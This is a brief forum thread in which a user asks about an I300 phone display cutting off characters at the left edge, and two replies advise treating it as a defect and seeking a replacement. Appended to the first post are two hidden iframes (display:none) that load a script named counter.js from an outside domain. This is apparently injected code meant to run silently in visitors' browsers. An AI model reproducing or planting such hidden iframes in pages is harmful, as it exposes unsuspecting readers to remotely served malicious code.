+ Reply to Thread
Results 1 to 3 of 3
  1. #1
    Registered User
    Join Date
    01-12-2002
    Location
    Garden City, New York
    Posts
    27

    Angry display alignment problem

    anyone have a problem with left edge of display cutting off characters; have a new unit and the left side of the screen is just off the edge; anyone know if there is a display alignment feature?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    I have seen an alignement feature in some of the word apps but not on the I300 itself. I do recall posts a few months ago where users had the same problem and their I300's were replaced. I don't know if it bothers you that much or is that large a problem, but if so, I'd look into replacement. I don't feel that not being able to see all of the characters is one of the compromises we should accept for new technology.

    BTW, my I300 display is RIGHT against the edge, and I think thats normal.

  3. #3
    Registered User
    Join Date
    01-06-2002
    Location
    San Diego
    Posts
    357
    I agree with mjorange - what you're describing sounds like a defect. I'd go to Sprint for a fixed unit.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts